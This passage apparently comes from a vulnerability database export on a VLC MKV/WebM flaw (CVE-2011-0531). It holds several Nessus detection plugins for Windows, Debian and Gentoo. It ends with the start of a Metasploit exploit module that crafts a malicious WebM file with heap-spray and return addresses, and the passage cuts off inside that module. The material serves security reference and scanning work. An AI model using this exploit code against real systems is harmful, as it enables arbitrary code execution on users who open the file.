Such versions are reportedly affected by the\nfollowing vulnerability :\n\n - Insufficient input validation when parsing a specially\n crafted Matroska or WebM (MKV) file can be exploited to\n execute arbitrary code.", "edition": 23, "published": "2011-02-02T00:00:00", "title": "VLC Media Player < 1.1.7 MKV Input Validation Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:videolan:vlc_media_player"], "id": "VLC_1_1_7.NASL", "href": "https://www.tenable.com/plugins/nessus/51851", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51851);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n\n script_name(english:\"VLC Media Player < 1.1.7 MKV Input Validation Vulnerability\");\n script_summary(english:\"Checks version of VLC\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains an media player that is affected by\na code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of VLC media player installed on the remote host is\nearlier than 1.1.7. 
Such versions are reportedly affected by the\nfollowing vulnerability :\n\n - Insufficient input validation when parsing a specially\n crafted Matroska or WebM (MKV) file can be exploited to\n execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.videolan.org/security/sa1102.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.videolan.org/developers/vlc-branch/NEWS\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to VLC Media Player version 1.1.7 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VideoLAN VLC MKV Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:videolan:vlc_media_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vlc_installed.nasl\");\n script_require_keys(\"SMB/VLC/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/VLC/Version\");\n\n# nb: 
'version' may look like '0.9.8a'!\nif (\n version =~ \"^0\\.\" ||\n version =~ \"^1\\.0\\.\" ||\n version =~ \"^1\\.1\\.[0-6]($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item(\"SMB/VLC/File\");\n if (isnull(path)) path = \"n/a\";\n else path = ereg_replace(pattern:\"^(.+)\\\\[^\\\\]+$\", replace:\"\\1\", string:path);\n\n report = \n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.1.7\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\nelse exit(0, \"The host is not affected since VLC \"+version+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:46:15", "description": "Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.", "edition": 17, "published": "2011-02-11T00:00:00", "title": "Debian DSA-2159-1 : vlc - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "modified": "2011-02-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:vlc"], "id": "DEBIAN_DSA-2159.NASL", "href": "https://www.tenable.com/plugins/nessus/51946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2159. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51946);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_xref(name:\"DSA\", value:\"2159\");\n\n script_name(english:\"Debian DSA-2159-1 : vlc - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/vlc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2159\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the vlc packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VideoLAN VLC MKV Memory Corruption');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libvlc-dev\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlc5\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore-dev\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore4\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mozilla-plugin-vlc\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-data\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-dbg\", reference:\"1.1.3-1squeeze3\")) 
flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-nox\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-fluidsynth\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-ggi\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-jack\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-notify\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-pulse\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-sdl\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svg\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svgalib\", reference:\"1.1.3-1squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-zvbi\", reference:\"1.1.3-1squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:46:26", "description": "Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of\narbitrary code if a user is tricked into opening a malformed media\nfile.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159(CVE-2010-0522,\nCVE-2010-1441, CVE-2010-1442 and CVE-2011-0531 ).", "edition": 16, "published": "2011-04-07T00:00:00", "title": "Debian DSA-2211-1 : vlc - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", 
"CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "modified": "2011-04-07T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:vlc"], "id": "DEBIAN_DSA-2211.NASL", "href": "https://www.tenable.com/plugins/nessus/53304", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2211. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53304);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-3275\", \"CVE-2010-3276\");\n script_bugtraq_id(47012);\n script_xref(name:\"DSA\", value:\"2211\");\n\n script_name(english:\"Debian DSA-2211-1 : vlc - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of\narbitrary code if a user is tricked into opening a malformed media\nfile.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159(CVE-2010-0522,\nCVE-2010-1441, CVE-2010-1442 and CVE-2011-0531 ).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-0522\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1441\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1442\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-0531\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/vlc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2211\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the vlc packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC AMV Dangling Pointer Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/07\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"vlc\", reference:\"0.8.6.h-4+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlc-dev\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlc5\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore-dev\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libvlccore4\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mozilla-plugin-vlc\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-data\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-dbg\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-nox\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-fluidsynth\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-ggi\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-jack\", reference:\"1.1.3-1squeeze4\")) flag++;\nif 
(deb_check(release:\"6.0\", prefix:\"vlc-plugin-notify\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-pulse\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-sdl\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svg\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-svgalib\", reference:\"1.1.3-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"vlc-plugin-zvbi\", reference:\"1.1.3-1squeeze4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:56:25", "description": "The remote host is affected by the vulnerability described in GLSA-201411-01\n(VLC: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VLC. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file using VLC, possibly resulting in execution of arbitrary code with\n the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 20, "published": "2014-11-06T00:00:00", "title": "GLSA-201411-01 : VLC: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1684", "CVE-2011-0522", "CVE-2012-3377", "CVE-2011-2194", "CVE-2013-1954", "CVE-2010-3124", "CVE-2011-0531", "CVE-2010-1441", "CVE-2012-1775", "CVE-2011-2588", "CVE-2013-1868", "CVE-2010-3275", "CVE-2010-1442", "CVE-2013-6283", "CVE-2011-3623", "CVE-2010-3907", "CVE-2010-2937", "CVE-2011-0021", "CVE-2012-2396", "CVE-2011-1087", "CVE-2013-6934", "CVE-2012-0023", "CVE-2012-5855", "CVE-2012-5470", "CVE-2010-1443", "CVE-2013-4388", "CVE-2012-1776", "CVE-2010-3276", "CVE-2010-1445", "CVE-2013-3245", "CVE-2011-2587", "CVE-2010-1444", "CVE-2010-2062"], "modified": "2014-11-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:vlc"], "id": "GENTOO_GLSA-201411-01.NASL", "href": "https://www.tenable.com/plugins/nessus/78879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201411-01.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78879);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1441\", \"CVE-2010-1442\", \"CVE-2010-1443\", \"CVE-2010-1444\", \"CVE-2010-1445\", \"CVE-2010-2062\", \"CVE-2010-2937\", \"CVE-2010-3124\", \"CVE-2010-3275\", \"CVE-2010-3276\", \"CVE-2010-3907\", \"CVE-2011-0021\", \"CVE-2011-0522\", \"CVE-2011-0531\", \"CVE-2011-1087\", \"CVE-2011-1684\", \"CVE-2011-2194\", \"CVE-2011-2587\", \"CVE-2011-2588\", \"CVE-2011-3623\", \"CVE-2012-0023\", \"CVE-2012-1775\", \"CVE-2012-1776\", \"CVE-2012-2396\", \"CVE-2012-3377\", \"CVE-2012-5470\", \"CVE-2012-5855\", \"CVE-2013-1868\", \"CVE-2013-1954\", \"CVE-2013-3245\", \"CVE-2013-4388\", \"CVE-2013-6283\", \"CVE-2013-6934\");\n script_bugtraq_id(42386, 45632, 45927, 46008, 46060, 47012, 47293, 48171, 48664, 51231, 52550, 53391, 53535, 54345, 55850, 57079, 57333, 61032, 61844, 62724, 65139);\n script_xref(name:\"GLSA\", value:\"201411-01\");\n\n script_name(english:\"GLSA-201411-01 : VLC: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201411-01\n(VLC: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VLC. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file using VLC, possibly resulting in execution of arbitrary code with\n the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201411-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VLC users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/vlc-2.1.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VLC MMS Stream Handling Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vlc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo 
Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/vlc\", unaffected:make_list(\"ge 2.1.2\"), vulnerable:make_list(\"lt 2.1.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VLC\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-12T20:03:17", "description": "This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. 
NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it.\n", "published": "2011-02-03T18:16:40", "type": "metasploit", "title": "VideoLAN VLC MKV Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_WEBM", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VideoLAN VLC MKV Memory Corruption',\n 'Description' => %q{\n This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Dan Rosenberg' ],\n 'References' =>\n [\n [ 'OSVDB', '70698' ],\n [ 'CVE', '2011-0531' ],\n [ 'BID', '46060' ],\n [ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],\n [ 'URL', 'http://www.videolan.org/security/sa1102.html' ]\n ],\n 'Payload' =>\n {\n 'Space'\t\t=> 1024,\n 'DisableNops'\t=> true,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'VLC 1.1.6 on Windows XP SP3',\n {\n 'SprayTarget' => 0x030b030a,\n 'Ret' => 0x6ce091b5,\t\t# Pointer to SprayTarget\n 'Base' => 0x6cd00000,\t\t# Base of libtaglib_plugin.dll\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 31 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.webm']),\n ])\n end\n\n def exploit\n\n rop_base = 
target[\"Base\"]\n spray = target[\"SprayTarget\"]\n\n # EBML Header\n file = \"\\x1A\\x45\\xDF\\xA3\"\t# EBML\n file << \"\\x01\\x00\\x00\\x00\"\n file << \"\\x00\\x00\\x00\\x1F\"\n file << \"\\x42\\x86\\x81\\x01\"\t# EBMLVersion = 1\n file << \"\\x42\\xF7\\x81\\x01\"\t# EBMLReadVersion = 1\n file << \"\\x42\\xF2\\x81\\x04\"\t# EBMLMaxIDLength = 4\n file << \"\\x42\\xF3\\x81\\x08\"\t# EBMLMaxSizeLength = 8\n file << \"\\x42\\x82\\x84\\x77\"\t# DocType = \"webm\"\n file << \"\\x65\\x62\\x6D\"\n file << \"\\x42\\x87\\x81\\x02\"\t# DocTypeVersion = 2\n file << \"\\x42\\x85\\x81\\x02\"\t# DocTypeReadVersion = 2\n\n # Segment data\n file << \"\\x18\\x53\\x80\\x67\"\t# (0) Segment\n file << \"\\x01\\x00\\x00\\x00\"\n file << \"\\x01\\xD6\\x22\\xF1\"\n\n # Seek data\n file << \"\\x11\\x4D\\x9B\\x74\"\t# (1) SeekHead\n file << \"\\x40\\x3F\"\n\n file << \"\\x4D\\xBB\\x8B\"\t\t# (2) Seek\n file << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Segment Info\n file << \"\\x15\\x49\\xA9\\x66\"\t#\n\n file << \"\\x53\\xAC\\x81\"\t\t# (3) SeekPosition\n file << \"\\xff\"\t\t\t# \tindex of segment info\n\n # Trigger the bug with an out-of-order element\n file << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Tracks\n file << \"\\x16\\x54\\xAE\\x6B\"\t#\n\n file << \"\\x42\" * 228 \t\t# Padding\n\n # Data\n file << \"\\x15\\x49\\xA9\\x66\"\t# (1) Segment Info\n file << \"\\x01\\x00\\x00\\x00\"\t#\n file << \"\\x01\\xff\\xff\\xff\"\t# This triggers our heap spray...\n file << [target.ret].pack('V')\t# Pointer to our heap spray\n\n # The alignment plays nice, so EIP will always\n # hit our pivot when our heapspray works. 
